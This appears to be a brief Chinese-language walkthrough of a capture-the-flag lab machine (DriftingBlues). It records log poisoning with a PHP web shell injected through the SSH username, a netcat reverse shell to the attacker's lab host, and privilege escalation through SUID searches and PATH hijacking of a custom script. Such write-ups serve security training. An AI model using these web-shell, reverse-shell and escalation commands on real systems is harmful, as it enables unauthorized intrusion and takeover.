發現 /robots.txt -> /eventadmins/ -> /littlequeenofspades.html -> /adminsfixit.php
介面包含ssh日誌,透過嘗試發現ssh連線後會更新日誌,使用php一句話木馬 ssh -l '<?php system($_GET[\"cmd\"]);?>' 192.168.56.111
在kali下執行此命令出現錯誤:
~ >> ssh -l '<?php system($_GET[\"cmd\"]);?>' 192.168.56.111
remote username contains invalid characters
使用windows下powershell執行後成功
反彈shell driftingblues.box/adminsfixit.php?cmd=nc 192.168.56.1 8000 -e /bin/bash
可見 .ssh 目錄是其他使用者可寫的,生成ssh私鑰用於登入 ssh-keygen -t rsa
提取套路:
- linpeas.sh 指令碼資訊收集
- pspy 監聽程序
- find命令搜尋許可權為s的命令
透過命令搜尋許可權為 s 的命令:
find / -type f -perm -04000 -o -perm -02000 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
可見 /usr/bin/getinfo 是自定義指令碼,自己定義命令 cat ip 等使getinfo指令碼在呼叫過程中啟動shell